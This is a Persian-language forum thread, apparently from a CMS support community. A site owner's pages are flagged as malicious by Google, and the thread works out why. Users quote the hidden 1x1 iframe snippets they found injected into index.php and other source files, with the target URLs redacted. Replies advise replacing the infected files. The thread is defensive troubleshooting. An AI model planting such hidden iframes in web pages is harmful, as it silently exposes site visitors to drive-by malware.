بابا تورو خدا یکی یک کمک درست و حسابی بکنه یا از طریق راهنمای گوگل پی ببر این سایت چش شده تا رفع کنم و گرنه باید قید انجمن رو بزنم چون هرچی گشتم نتونستم مشکلو حل کنم
نمایش نسخه قابل چاپ
بابا تورو خدا یکی یک کمک درست و حسابی بکنه یا از طریق راهنمای گوگل پی ببر این سایت چش شده تا رفع کنم و گرنه باید قید انجمن رو بزنم چون هرچی گشتم نتونستم مشکلو حل کنم
[quote author=parsiansystem.net link=topic=19600.msg104343#msg104343 date=1237740262]
[quote author=akhani link=topic=19600.msg104342#msg104342 date=1237739582]
سلام به همه
از اینکه جوابمو دادید ممنونم اما از کجا اون کد مخرب رو پیدا کنم
ضمنا آقا مجید زبانم زیاد خوب نیست و تو توضیحات راهنمای گوگل چیزی دستگیرم نشد اگه شما راهنمایی کنید یا از طریق گوگل مشکل منو حل کنید ممنون میشم
[/quote]
دوست عزیز اصلاً کد نویسی قالب شما مشکل داره ایتدای کد قالب شما اصلاً ... ???
از اون طرفم بعد از هر چند تا خط کد شما این ها رو اضافه کردید که هم حجم قالبتان بالا میرود و هم اشتباه استکد:<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<HTML>
<HEAD>
در مورد اخطار گوگل : شاید قبلاً از کدی مخرب استفاده کرده اید که گوگل شما رو تهدید آمیز قلم داد میکند و باید تا مراجعه ی بعدی گوگل منتظر بمونید و یا اینکه به خاطر کد نویسیه قالبتونهکد:<meta http-equiv="Content-Language" content="fa">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
[/quote][quote author=سعید link=topic=19600.msg104359#msg104359 date=1237755255]
[quote author=akhani link=topic=19600.msg104342#msg104342 date=1237739582]
از اینکه جوابمو دادید ممنونم اما از کجا اون کد مخرب رو پیدا کنم
ضمنا آقا مجید زبانم زیاد خوب نیست و تو توضیحات راهنمای گوگل چیزی دستگیرم نشد اگه شما راهنمایی کنید یا از طریق گوگل مشکل منو حل کنید ممنون میشم
[/quote]
[quote author=سعید link=topic=19600.msg104315#msg104315 date=1237718860]
اینجا رو هم مطالعه کنید شاید مفید باشه:
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
[/quote]
[quote author=moh0917 link=topic=19600.msg104355#msg104355 date=1237751272]
اینا دامین رو مخرب تشخیص دادن یا هاست رو؟
یعنی منظورم اینه که آی پی هاست رو دارن یا دامین رو
اگه دامین عوض شه بازم اینجوریه؟
[/quote]
هیچ کدوم. با تعویض هیچ کدوم تغییری نمی کنه، نهایتا با تغییر دامنه ممکن هاز اول تشخیص نده، اما بعد از مدتی دوباره ...
باید کدها اصلاح بشن.
[/quote][quote author=moh0917 link=topic=19600.msg104368#msg104368 date=1237786465]
حتی وقتی کد ها اصلاح شده باشند هم به همین ترتیب هست یعنی لا اقل یه مدت طول میکشه تا به درخواست توشط گوگل رسیدگی بشه
میخواستم بدونم این تشخیص اونها از روی آی پی هاست هست یا دامین
[/quote][quote author=akhani link=topic=19600.msg104419#msg104419 date=1237839938]
[/quote]
دیگه چه کمکی دوست عزیز بنده کد قالب شما را دیدم... و قالب شما بسیار بسیار خراب بود و مشکل داشت...و حتی فکر کنم دوباره دستکاریش کرده اید چون اوضاعش خیلی بدتر شده ...
شما باید قالبتان را مجدداً طبق استانداردهای موجود طراحی کنید و یا اینکه اگر قالبتان را از جایی دریافت کرده اید و مشکل نداشته ...قالبتان را با قالب اصلی جایگزین کنید و یا قالب را عوض کنید ...
تا هم فایرفاکس اجازه ورود به کاربران را بدهد و هم گوگل سایت شما را مخرب نشناسد ...
یا حق
سلام
شما از قالب بدون مشکل استفاده کن (مثلاً پیشفرض!) بعد از مدتی (مثلاً دو هفته) چک کنید و ببینید مشکل شما حل شده یا نه!
اگر حل نشد باید ببینید مشکل جدید و یا ایراد جدیدی که گرفته میشود چیست و آن را نیز برطرف کنید.
کمک بیشتر از ما بر نمی آید، ما در اینجا به مشکلات رسیدگی میکنیم و به شما کمک میکنیم تا مشکلات را خودتان رفع کنید، اما کار اصلی و انجام این توصیه ها بر عهده شماست.
یا حق
چشم من از امروز از قالب پیش فرض استفاده کردم اگر تا 10 روز دیگه مشکلم حل نشد قید انجمن رو میزنم :'(
[quote author=akhani link=topic=19600.msg104519#msg104519 date=1238075118]
چشم من از امروز از قالب پیش فرض استفاده کردم اگر تا 10 روز دیگه مشکلم حل نشد قید انجمن رو میزنم :'(
[/quote]
دوست عزیز شما از یک قالب بدون مشکل استفاده کنید و از کدهای جاوا کمتر استفاده کنید اگر مشکل شما با تغییر قالب انجمن رفع نشد باید بیشتر بررسی کرد تا مشکلتان رفع شود ... ولی دوست عزیز این جواب خوبی برای دوستان مامبویی ما نیست ...دوستانی که در تلاش هستند شبانه روز تا مشکل دیگران و خود را رفع کنند ...
انجمن و دوستان تلاش و راهنمایی های لازم را به شما کرده اند؛میکنند و خواهند کرد...10 روز شما بستگی به گوگل دارد قبلاً هم عرض کرده بودیم که شاید زمان بیشتری نیاز باشد تا مشکلتان رفع شود...وقتی گوگل سایتی را مخرب بر میشمارد به همین سادگیا اونو قبول نمیکنه...امید داشته باشید، تا آنجا که بتوانیم کمکتان خواهیم کرد
یا حق
دوست من شما قید انجمن رو نزن، کمی تلاش کن :دی
بطور مثال من یک سایت داشتم که مخرب شناخته شد توسط گوگل!!!! 6 ماه از لیست گوگل خارج نمیشد! بعدها دلیل را در یک موضوع بسیار ساده پیدا کردم و ... . شما هم باید به دنبال دلیل اصلی باشی. ممکنه که دلایل زیادی برای این مورد وجود داشته باشه!
یا حق
سلام بایت تایپ قبلی معذرت آخه خیلی اذیت شدم این چند روزه -چندین بار سایتم رو با ویروس کش هاستم ویروس کشی کردم اما بالاخره تا حدود زیادی مشکل رو فهمیدم و یک کارای کردم تا ببینم نتیجه اون چی میشه-درسته قالب سایتم ایراد داره ولی اصلا مشکل قالب نبود حتی اگر قالب پیش فرض رو هم انتخاب میکردم بازم مشکلم حل نمیشد اخه تو پوشه سورس یکی از فایلهام یک لینک به یک سایت مخرب نشسته بود و یک فریم خیلی کوچیک باز میکرد هیچ ویروس کشی اونو نمیشناخت اما گوگل با تعقیب لینکهای سایت به اون سایت مخرب میرسد و سایت منو هم مخرب میشناخت خیلی گشتم تا عاقبت اتفاقی اون کد رو دیدم حالا از کجا این کد رفته تو پوشه سورس من نمیدونم
اینم اون کد برای اینکه این بلا سر کس دیگه نیاد
تا حالا دوتا پیدا کردم قالبم رو به همون قلب vb که خیلی دوست دارم تغییر دادم و منتظر گوگل میمونمکد:<iframe src="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] width=1 height=1 style="border:0"></iframe>
با تشکر از همه دوستان که تو این مدت کمک کردن مخصوصا پسر مهربون
موفق باشید :-*
متاسفانه این مشکل در سایت ما هم دیده شد
این ویروس در پایین ترین خط کد تمام صفحات
index.php
این کد را اضافه کرده
حالا راه حل مشکل چیست ؟کد:<iframe src="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] width=1 height=1 style="visibility: hidden"></iframe>
آنتی ویروس من اجازه ورود به سایت را هم نمی ده
سلام دوست عزیز متاسفانه شما قالب های انجمن را دستکاری کردید و اون کامپیوتر که این فایلها رو دست زدید ویروسی بوده متاسفانه این ویروس با آلوده کردن کدهای اچ تی ام ال در موقع وصل به اینترنت یک فریم کوچک از لینک به سایتهای مخرب رو تو سایت شما باز میکنه و کامپیوتر کاربران سایت شما را آلوده میکنه فایلهای دست کاری شده را اگر با فرانت پیچ باز کنید یک فریم کوچک که لینک به این سایتهای مخرب شده را میبینید اون فایلها را با فایلهای اصلی جایگزین کن
شما درخواست تجدید نظر به گوگل دادید ؟
برسی این درخواست بین سه تا 10 روز وقت می بره.